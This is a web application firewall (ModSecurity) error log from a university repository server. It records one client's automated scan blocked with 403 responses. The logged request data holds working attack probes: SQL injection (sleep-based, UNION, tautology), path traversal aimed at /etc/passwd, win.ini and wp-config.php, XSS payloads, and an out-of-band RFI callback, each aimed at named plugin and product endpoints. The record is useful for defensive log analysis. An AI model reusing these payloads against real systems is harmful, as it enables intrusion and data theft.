[Tue Aug 29 11:35:33.379060 2023] [:error] [pid 1402] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:id_form. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: -- - found within ARGS:id_form: 1 UNION ALL SELECT NULL,NULL,md5(999999999),NULL,NULL,NULL,NULL,NULL-- -"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repositoryfh.unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO11lcCo-f0AAAV6LB4AAAAI"]
[Tue Aug 29 11:35:34.303082 2023] [:error] [pid 1297] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../../ found within ARGS:controller: ../../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repositoryfh.unla.ac.id"] [uri "/wp-content/plugins/cab-fare-calculator/tblight.php"] [unique_id "ZO11lsCo-f0AAAUR888AAABI"]
[Tue Aug 29 11:35:34.318977 2023] [:error] [pid 1160] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data:  'sWZA'='sWZA found within ARGS:id: test' AND (SELECT 2844 FROM (SELECT(SLEEP(6)))FDTM) AND 'sWZA'='sWZA"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "repositoryfh.unla.ac.id"] [uri "/classes/Master.php"] [unique_id "ZO11lsCo-f0AAASI0HoAAAAG"]
[Tue Aug 29 11:35:34.378645 2023] [:error] [pid 963] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4|ipv ..." at ARGS:fingerprint. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: SLEEP( found within ARGS:fingerprint: (SELECT SLEEP(6))"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.6"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "repositoryfh.unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO11lsCo-f0AAAPDoUAAAAAP"]
[Tue Aug 29 11:35:35.339803 2023] [:error] [pid 1238] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:queriesCnt. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:queriesCnt:  cat/etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "repositoryfh.unla.ac.id"] [uri "/"] [unique_id "ZO11l8Co-f0AAATWYV0AAAAa"]
[Tue Aug 29 11:35:35.399703 2023] [:error] [pid 984] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 3 at TX:sqli_select_statement_count. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "108"] [id "981317"] [rev "2"] [msg "SQL SELECT Statement Anomaly Detection Alert"] [data "Matched Data:  found within TX:sqli_select_statement_count: 3"] [ver "OWASP_CRS/2.2.8"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "repositoryfh.unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO11l8Co-f0AAAPY1tgAAAAh"]
[Tue Aug 29 11:36:24.643757 2023] [:error] [pid 1232] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:table_name. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ); --\\x22 found within ARGS:table_name: pg_user\\x22; select pg_sleep(6); --\\x22"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repositoryfh.unla.ac.id"] [uri "/api/v2/open/rowsInfo"] [unique_id "ZO11yMCo-f0AAATQXmQAAAAO"]
[Tue Aug 29 11:36:25.560912 2023] [:error] [pid 1423] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:file_name. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../..// found within ARGS:file_name: ../../../../../..//etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repositoryfh.unla.ac.id"] [uri "/cgi-bin/tsaupload.cgi"] [unique_id "ZO11ycCo-f0AAAWPpXMAAAAH"]
[Tue Aug 29 11:36:26.018481 2023] [:error] [pid 1423] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:controller: ../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repositoryfh.unla.ac.id"] [uri "/index.php"] [unique_id "ZO11ysCo-f0AAAWPpX4AAAAH"]
[Tue Aug 29 11:36:26.109448 2023] [:error] [pid 1434] [client 143.42.78.27] ModSecurity: Rule 7fe1c67ac3c8 [id "981246"][file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"][line "239"] - Execution error - PCRE limits exceeded (-8): (null). [hostname "repositoryfh.unla.ac.id"] [uri "/xmlpserver/services/XMLPService"] [unique_id "ZO11ysCo-f0AAAWa-UMAAAAI"]
[Tue Aug 29 11:36:26.624361 2023] [:error] [pid 1434] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:file: /etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "repositoryfh.unla.ac.id"] [uri "/index.php"] [unique_id "ZO11ysCo-f0AAAWa-U8AAAAI"]
[Tue Aug 29 11:36:28.434161 2023] [:error] [pid 1436] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../../../../../../ found within ARGS:file: ../../../../../../../../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repositoryfh.unla.ac.id"] [uri "/ccmivr/IVRGetAudioFile.do"] [unique_id "ZO11zMCo-f0AAAWcCQoAAAAL"]
[Tue Aug 29 11:36:29.367050 2023] [:error] [pid 1444] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:true_path. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../ found within ARGS:true_path: ../../../../../../windows/win.ini"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repositoryfh.unla.ac.id"] [uri "/index.php/Pan/ShareUrl/downloadSharedFile"] [unique_id "ZO11zcCo-f0AAAWkfTUAAAAQ"]
[Tue Aug 29 11:36:30.424951 2023] [:error] [pid 1232] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:folder. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../../../../../../ found within ARGS:folder: ../../../../../../../../../../../../../../../etc/"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repositoryfh.unla.ac.id"] [uri "/index.php"] [unique_id "ZO11zsCo-f0AAATQXnEAAAAO"]
[Tue Aug 29 11:36:32.415530 2023] [:error] [pid 1156] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:controller: ../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repositoryfh.unla.ac.id"] [uri "/index.php"] [unique_id "ZO110MCo-f0AAASEJekAAAAE"]
[Tue Aug 29 11:36:33.512159 2023] [:error] [pid 1405] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){4,}" at ARGS:keyword. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "159"] [id "981173"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: % found within ARGS:keyword: %61%27%20%75%6e%69%6f%6e%20%73%65%6c%65%63%74%20%31%2c%27%27%2b%28%53%45%4c%45%43%54%20%6d%64%35%28%39%39%39%39%39%39%39%29%29%2b%27"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "repositoryfh.unla.ac.id"] [uri "/mobile/plugin/browser.jsp"] [unique_id "ZO110cCo-f0AAAV9bzoAAAAA"]
[Tue Aug 29 11:36:33.551924 2023] [:error] [pid 1405] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../ found within ARGS:controller: ../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repositoryfh.unla.ac.id"] [uri "/index.php"] [unique_id "ZO110cCo-f0AAAV9bzwAAAAA"]
[Tue Aug 29 11:36:34.360721 2023] [:error] [pid 1307] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:page. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../ found within ARGS:page: ../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repositoryfh.unla.ac.id"] [uri "/pandora_console/ajax.php"] [unique_id "ZO110sCo-f0AAAUbg8IAAABQ"]
[Tue Aug 29 11:36:34.361378 2023] [:error] [pid 1159] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){4,}" at ARGS:ID. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "159"] [id "981173"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: > found within ARGS:ID: <svg onload=alert(document.domain)>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "repositoryfh.unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO110sCo-f0AAASHiDsAAAAD"]
[Tue Aug 29 11:36:36.971456 2023] [:error] [pid 1156] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:ACS_path. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../../../../../../../ found within ARGS:ACS_path: ../../../../../../../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repositoryfh.unla.ac.id"] [uri "/advanced_component_system/index.php"] [unique_id "ZO111MCo-f0AAASEJf8AAAAE"]
[Tue Aug 29 11:36:37.388158 2023] [:error] [pid 1232] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:urlPath. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: :/// found within ARGS:urlPath: file:///etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repositoryfh.unla.ac.id"] [uri "/getCorsFile"] [unique_id "ZO111cCo-f0AAATQXogAAAAO"]
[Tue Aug 29 11:36:37.425240 2023] [:error] [pid 1451] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:urlPath. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: :/// found within ARGS:urlPath: file:///c://windows/win.ini"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repositoryfh.unla.ac.id"] [uri "/getCorsFile"] [unique_id "ZO111cCo-f0AAAWrxqYAAAAY"]
[Tue Aug 29 11:36:38.393205 2023] [:error] [pid 1447] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:href. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../ found within ARGS:href: ../../../../windows/win.ini"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repositoryfh.unla.ac.id"] [uri "/_s_/dyn/Log_highlight"] [unique_id "ZO111sCo-f0AAAWnjhQAAAAT"]
[Tue Aug 29 11:36:39.402063 2023] [:error] [pid 1232] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: http://cjmnbitjmimt14dgn26gb977hpqogqb3a.oast.site found within TX:1: cjmnbitjmimt14dgn26gb977hpqogqb3a.oast.site"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "repositoryfh.unla.ac.id"] [uri "/securityRealm/user/admin/descriptorByName/org.jenkinsci.plugins.github.config.GitHubTokenCredentialsCreator/createTokenByPassword"] [unique_id "ZO1118Co-f0AAATQXpQAAAAO"]
[Tue Aug 29 11:36:41.483149 2023] [:error] [pid 1445] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:cID. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\x22></ found within ARGS:cID: \\x22></iframe><svg/onload=alert(\\x222UdyWLo0lCLqcBCjs5YehILlcGu\\x22)>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repositoryfh.unla.ac.id"] [uri "/ccm/system/panels/page/preview_as_user/preview"] [unique_id "ZO112cCo-f0AAAWlCdMAAAAR"]
[Tue Aug 29 11:36:42.355482 2023] [:error] [pid 1307] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:controller: ../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repositoryfh.unla.ac.id"] [uri "/index.php"] [unique_id "ZO112sCo-f0AAAUbg9YAAABQ"]
[Tue Aug 29 11:36:42.377516 2023] [:error] [pid 1156] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileName. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileName: /etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "repositoryfh.unla.ac.id"] [uri "/LetsEncrypt/Index"] [unique_id "ZO112sCo-f0AAASEJhUAAAAE"]
[Tue Aug 29 11:36:44.438688 2023] [:error] [pid 1444] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:idusuario. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: ' found within ARGS:idusuario: '"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "repositoryfh.unla.ac.id"] [uri "/controller/login.php"] [unique_id "ZO113MCo-f0AAAWkfUsAAAAQ"]
[Tue Aug 29 11:36:46.364347 2023] [:error] [pid 1423] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:idusuario. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: '' found within ARGS:idusuario: ''"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "repositoryfh.unla.ac.id"] [uri "/controller/login.php"] [unique_id "ZO113sCo-f0AAAWPpZYAAAAH"]
[Tue Aug 29 11:36:49.511202 2023] [:error] [pid 1423] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:pdf. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../ found within ARGS:pdf: ../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repositoryfh.unla.ac.id"] [uri "/report/download.php"] [unique_id "ZO114cCo-f0AAAWPpasAAAAH"]
[Tue Aug 29 11:36:56.520862 2023] [:error] [pid 1408] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:filename. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../ found within ARGS:filename: ../../../../wp-config.php"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repositoryfh.unla.ac.id"] [uri "/wp-content/plugins/wpsite-background-takeover/exports/download.php"] [unique_id "ZO116MCo-f0AAAWAgt8AAAAG"]
[Tue Aug 29 11:36:57.475241 2023] [:error] [pid 1307] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:login. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: )>\\x22@ found within ARGS:login: \\x22<svg/onload=alert(document.domain)>\\x22@gmail.com"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repositoryfh.unla.ac.id"] [uri "/thruk/cgi-bin/login.cgi"] [unique_id "ZO116cCo-f0AAAUbhAIAAABQ"]
[Tue Aug 29 11:37:07.460139 2023] [:error] [pid 1247] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:file: /etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "repositoryfh.unla.ac.id"] [uri "/download.php"] [unique_id "ZO1188Co-f0AAATfd@UAAAAk"]
[Tue Aug 29 11:37:09.387711 2023] [:error] [pid 1470] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:controller: ../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repositoryfh.unla.ac.id"] [uri "/index.php"] [unique_id "ZO119cCo-f0AAAW@X54AAAAL"]
[Tue Aug 29 11:37:16.471375 2023] [:error] [pid 1472] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:tf_version. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: ' found within ARGS:tf_version: ' and (select pg_sleep(10)) ISNULL--"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "repositoryfh.unla.ac.id"] [uri "/api/search/attribute"] [unique_id "ZO11-MCo-f0AAAXA9WwAAAAO"]
